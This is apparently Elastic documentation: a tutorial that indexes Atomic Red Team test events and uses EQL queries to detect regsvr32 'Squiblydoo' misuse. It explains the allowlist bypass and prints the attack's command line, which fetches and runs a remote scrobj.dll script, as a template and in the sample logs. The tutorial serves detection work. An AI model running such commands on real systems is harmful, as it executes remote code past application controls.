Example: Detect threats with EQL

Example: Detect threats with EQL

This example tutorial shows how you can use EQL to detect security threats and other suspicious behavior. In the scenario, you’re tasked with detecting regsvr32 misuse in Windows event logs.

regsvr32.exe is a built-in command-line utility used to register .dll libraries in Windows. As a native tool, regsvr32.exe has a trusted status, letting it bypass most allowlist software and script blockers. Attackers with access to a user’s command line can use regsvr32.exe to run malicious scripts via .dll libraries, even on machines that otherwise disallow such scripts.

One common variant of regsvr32 misuse is a Squiblydoo attack. In a Squiblydoo attack, a regsvr32.exe command uses the scrobj.dll library to register and run a remote script. These commands often look like this:

  1. "regsvr32.exe /s /u /i:<script-url> scrobj.dll"

Setup

This tutorial uses a test dataset from Atomic Red Team that includes events imitating a Squiblydoo attack. The data has been mapped to Elastic Common Schema (ECS) fields.

To get started:

  1. Create an index template with data stream enabled:

    1. resp = client.indices.put_index_template(
    2. name="my-data-stream-template",
    3. index_patterns=[
    4. "my-data-stream*"
    5. ],
    6. data_stream={},
    7. priority=500,
    8. )
    9. print(resp)
    1. response = client.indices.put_index_template(
    2. name: 'my-data-stream-template',
    3. body: {
    4. index_patterns: [
    5. 'my-data-stream*'
    6. ],
    7. data_stream: {},
    8. priority: 500
    9. }
    10. )
    11. puts response
    1. const response = await client.indices.putIndexTemplate({
    2. name: "my-data-stream-template",
    3. index_patterns: ["my-data-stream*"],
    4. data_stream: {},
    5. priority: 500,
    6. });
    7. console.log(response);
    1. PUT /_index_template/my-data-stream-template
    2. {
    3. "index_patterns": [ "my-data-stream*" ],
    4. "data_stream": { },
    5. "priority": 500
    6. }
  2. Download normalized-T1117-AtomicRed-regsvr32.json.

  3. Use the bulk API to index the data to a matching stream:

    1. curl -H "Content-Type: application/json" -XPOST "localhost:9200/my-data-stream/_bulk?pretty&refresh" --data-binary "@normalized-T1117-AtomicRed-regsvr32.json"
  4. Use the cat indices API to verify the data was indexed:

    1. resp = client.cat.indices(
    2. index="my-data-stream",
    3. v=True,
    4. h="health,status,index,docs.count",
    5. )
    6. print(resp)
    1. response = client.cat.indices(
    2. index: 'my-data-stream',
    3. v: true,
    4. h: 'health,status,index,docs.count'
    5. )
    6. puts response
    1. const response = await client.cat.indices({
    2. index: "my-data-stream",
    3. v: "true",
    4. h: "health,status,index,docs.count",
    5. });
    6. console.log(response);
    1. GET /_cat/indices/my-data-stream?v=true&h=health,status,index,docs.count

    The response should show a docs.count of 150.

    1. health status index docs.count
    2. yellow open .ds-my-data-stream-2099.12.07-000001 150

Get a count of regsvr32 events

First, get a count of events associated with a regsvr32.exe process:

  1. resp = client.eql.search(
  2. index="my-data-stream",
  3. filter_path="-hits.events",
  4. query="\n any where process.name == \"regsvr32.exe\" \n ",
  5. size=200,
  6. )
  7. print(resp)
  1. const response = await client.eql.search({
  2. index: "my-data-stream",
  3. filter_path: "-hits.events",
  4. query: '\n any where process.name == "regsvr32.exe" \n ',
  5. size: 200,
  6. });
  7. console.log(response);
  1. GET /my-data-stream/_eql/search?filter_path=-hits.events
  2. {
  3. "query": """
  4. any where process.name == "regsvr32.exe"
  5. """,
  6. "size": 200
  7. }

?filter_path=-hits.events excludes the hits.events property from the response. This search is only intended to get an event count, not a list of matching events.

Matches any event with a process.name of regsvr32.exe.

Returns up to 200 hits for matching events.

The response returns 143 related events.

  1. {
  2. "is_partial": false,
  3. "is_running": false,
  4. "took": 60,
  5. "timed_out": false,
  6. "hits": {
  7. "total": {
  8. "value": 143,
  9. "relation": "eq"
  10. }
  11. }
  12. }

Check for command line artifacts

regsvr32.exe processes were associated with 143 events. But how was regsvr32.exe first called? And who called it? regsvr32.exe is a command-line utility. Narrow your results to processes where the command line was used:

  1. resp = client.eql.search(
  2. index="my-data-stream",
  3. query="\n process where process.name == \"regsvr32.exe\" and process.command_line.keyword != null\n ",
  4. )
  5. print(resp)
  1. const response = await client.eql.search({
  2. index: "my-data-stream",
  3. query:
  4. '\n process where process.name == "regsvr32.exe" and process.command_line.keyword != null\n ',
  5. });
  6. console.log(response);
  1. GET /my-data-stream/_eql/search
  2. {
  3. "query": """
  4. process where process.name == "regsvr32.exe" and process.command_line.keyword != null
  5. """
  6. }

The query matches one event with an event.type of creation, indicating the start of a regsvr32.exe process. Based on the event’s process.command_line value, regsvr32.exe used scrobj.dll to register a script, RegSvr32.sct. This fits the behavior of a Squiblydoo attack.

  1. {
  2. ...
  3. "hits": {
  4. "total": {
  5. "value": 1,
  6. "relation": "eq"
  7. },
  8. "events": [
  9. {
  10. "_index": ".ds-my-data-stream-2099.12.07-000001",
  11. "_id": "gl5MJXMBMk1dGnErnBW8",
  12. "_source": {
  13. "process": {
  14. "parent": {
  15. "name": "cmd.exe",
  16. "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
  17. "executable": "C:\\Windows\\System32\\cmd.exe"
  18. },
  19. "name": "regsvr32.exe",
  20. "pid": 2012,
  21. "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
  22. "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
  23. "executable": "C:\\Windows\\System32\\regsvr32.exe",
  24. "ppid": 2652
  25. },
  26. "logon_id": 217055,
  27. "@timestamp": 131883573237130000,
  28. "event": {
  29. "category": "process",
  30. "type": "creation"
  31. },
  32. "user": {
  33. "full_name": "bob",
  34. "domain": "ART-DESKTOP",
  35. "id": "ART-DESKTOP\\bob"
  36. }
  37. }
  38. }
  39. ]
  40. }
  41. }

Check for malicious script loads

Check if regsvr32.exe later loads the scrobj.dll library:

  1. resp = client.eql.search(
  2. index="my-data-stream",
  3. query="\n library where process.name == \"regsvr32.exe\" and dll.name == \"scrobj.dll\"\n ",
  4. )
  5. print(resp)
  1. const response = await client.eql.search({
  2. index: "my-data-stream",
  3. query:
  4. '\n library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll"\n ',
  5. });
  6. console.log(response);
  1. GET /my-data-stream/_eql/search
  2. {
  3. "query": """
  4. library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll"
  5. """
  6. }

The query matches an event, confirming scrobj.dll was loaded.

  1. {
  2. ...
  3. "hits": {
  4. "total": {
  5. "value": 1,
  6. "relation": "eq"
  7. },
  8. "events": [
  9. {
  10. "_index": ".ds-my-data-stream-2099.12.07-000001",
  11. "_id": "ol5MJXMBMk1dGnErnBW8",
  12. "_source": {
  13. "process": {
  14. "name": "regsvr32.exe",
  15. "pid": 2012,
  16. "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
  17. "executable": "C:\\Windows\\System32\\regsvr32.exe"
  18. },
  19. "@timestamp": 131883573237450016,
  20. "dll": {
  21. "path": "C:\\Windows\\System32\\scrobj.dll",
  22. "name": "scrobj.dll"
  23. },
  24. "event": {
  25. "category": "library"
  26. }
  27. }
  28. }
  29. ]
  30. }
  31. }

Determine the likelihood of success

In many cases, attackers use malicious scripts to connect to remote servers or download other files. Use an EQL sequence query to check for the following series of events:

  1. A regsvr32.exe process
  2. A load of the scrobj.dll library by the same process
  3. Any network event by the same process

Based on the command line value seen in the previous response, you can expect to find a match. However, this query isn’t designed for that specific command. Instead, it looks for a pattern of suspicious behavior that’s generic enough to detect similar threats.

  1. resp = client.eql.search(
  2. index="my-data-stream",
  3. query="\n sequence by process.pid\n [process where process.name == \"regsvr32.exe\"]\n [library where dll.name == \"scrobj.dll\"]\n [network where true]\n ",
  4. )
  5. print(resp)
  1. const response = await client.eql.search({
  2. index: "my-data-stream",
  3. query:
  4. '\n sequence by process.pid\n [process where process.name == "regsvr32.exe"]\n [library where dll.name == "scrobj.dll"]\n [network where true]\n ',
  5. });
  6. console.log(response);
  1. GET /my-data-stream/_eql/search
  2. {
  3. "query": """
  4. sequence by process.pid
  5. [process where process.name == "regsvr32.exe"]
  6. [library where dll.name == "scrobj.dll"]
  7. [network where true]
  8. """
  9. }

The query matches a sequence, indicating the attack likely succeeded.

  1. {
  2. ...
  3. "hits": {
  4. "total": {
  5. "value": 1,
  6. "relation": "eq"
  7. },
  8. "sequences": [
  9. {
  10. "join_keys": [
  11. 2012
  12. ],
  13. "events": [
  14. {
  15. "_index": ".ds-my-data-stream-2099.12.07-000001",
  16. "_id": "gl5MJXMBMk1dGnErnBW8",
  17. "_source": {
  18. "process": {
  19. "parent": {
  20. "name": "cmd.exe",
  21. "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
  22. "executable": "C:\\Windows\\System32\\cmd.exe"
  23. },
  24. "name": "regsvr32.exe",
  25. "pid": 2012,
  26. "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
  27. "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
  28. "executable": "C:\\Windows\\System32\\regsvr32.exe",
  29. "ppid": 2652
  30. },
  31. "logon_id": 217055,
  32. "@timestamp": 131883573237130000,
  33. "event": {
  34. "category": "process",
  35. "type": "creation"
  36. },
  37. "user": {
  38. "full_name": "bob",
  39. "domain": "ART-DESKTOP",
  40. "id": "ART-DESKTOP\\bob"
  41. }
  42. }
  43. },
  44. {
  45. "_index": ".ds-my-data-stream-2099.12.07-000001",
  46. "_id": "ol5MJXMBMk1dGnErnBW8",
  47. "_source": {
  48. "process": {
  49. "name": "regsvr32.exe",
  50. "pid": 2012,
  51. "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
  52. "executable": "C:\\Windows\\System32\\regsvr32.exe"
  53. },
  54. "@timestamp": 131883573237450016,
  55. "dll": {
  56. "path": "C:\\Windows\\System32\\scrobj.dll",
  57. "name": "scrobj.dll"
  58. },
  59. "event": {
  60. "category": "library"
  61. }
  62. }
  63. },
  64. {
  65. "_index": ".ds-my-data-stream-2099.12.07-000001",
  66. "_id": "EF5MJXMBMk1dGnErnBa9",
  67. "_source": {
  68. "process": {
  69. "name": "regsvr32.exe",
  70. "pid": 2012,
  71. "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
  72. "executable": "C:\\Windows\\System32\\regsvr32.exe"
  73. },
  74. "@timestamp": 131883573238680000,
  75. "destination": {
  76. "address": "151.101.48.133",
  77. "port": "443"
  78. },
  79. "source": {
  80. "address": "192.168.162.134",
  81. "port": "50505"
  82. },
  83. "event": {
  84. "category": "network"
  85. },
  86. "user": {
  87. "full_name": "bob",
  88. "domain": "ART-DESKTOP",
  89. "id": "ART-DESKTOP\\bob"
  90. },
  91. "network": {
  92. "protocol": "tcp",
  93. "direction": "outbound"
  94. }
  95. }
  96. }
  97. ]
  98. }
  99. ]
  100. }
  101. }